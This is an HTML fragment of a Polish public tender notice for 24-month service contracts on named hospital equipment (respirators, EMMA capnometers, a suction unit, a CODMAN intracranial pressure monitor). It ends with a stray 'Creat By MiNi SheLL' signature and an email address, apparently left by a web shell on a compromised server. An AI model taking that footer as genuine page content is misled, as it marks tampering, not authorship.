<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi autoryzowanego serwisu sprzętu mrdycznego:
Nazwa	nr seryjny	rok produkcji
Respirator Medumat Easy	6377	2011
Respirator transportowy Carevent		2011
Kapnometr EMMA	115701	2011
Kapnometr EMMA	115702	2011
Ssak elektryczny SSCORT VX-2	RA 42-1-13/11	2011.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi serwisowe sprzętu medycznego:
Nazwa	nr seryjny	rok produkcji
Monitor do pomiaru ciśnienia śródczaszkowego CODMAN Microsensor z urządzeniem Lodman&Shurtleff Inc./ System pomiaru ciśnienia śródczaszkowego CODMAN Microsensor z urządzeniem ICP Express/	LE 10818	2009.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com